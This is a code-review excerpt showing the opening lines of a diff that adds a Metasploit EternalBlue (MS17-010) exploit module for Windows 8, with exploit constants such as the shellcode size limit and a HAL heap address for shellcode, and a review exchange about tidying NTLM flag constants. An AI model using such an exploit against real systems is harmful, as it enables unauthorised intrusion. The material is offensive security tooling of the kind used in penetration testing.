modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb

```diff
@@ -0,0 +1,945 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb'
+require 'ruby_smb/smb1/packet'
+require 'rubyntlm'
+require 'net/ntlm'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  MAX_SHELLCODE_SIZE = 3712
+
+  # debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.
+  # The 0xffffffffffd00000 address should be useable when debug mode is not enabled
+  # The 0xffffffffffd01000 address should be useable when debug mode is enabled
+  TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode
+
+  # because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000
+  NTFEA_SIZE = 0x9000
+
+  NTLM_FLAGS = 2693267973
```

Comment:
Is it worth unpacking these to use the same NTLM library constants similar to ruby smb?

https://github.com/rapid7/ruby_smb/blob/cedd90716f0d48098a92702d4d0c5ec392d2ab08/lib/ruby_smb/client.rb#L310-L313

Reply:
Definitely, this is some eye bleed right here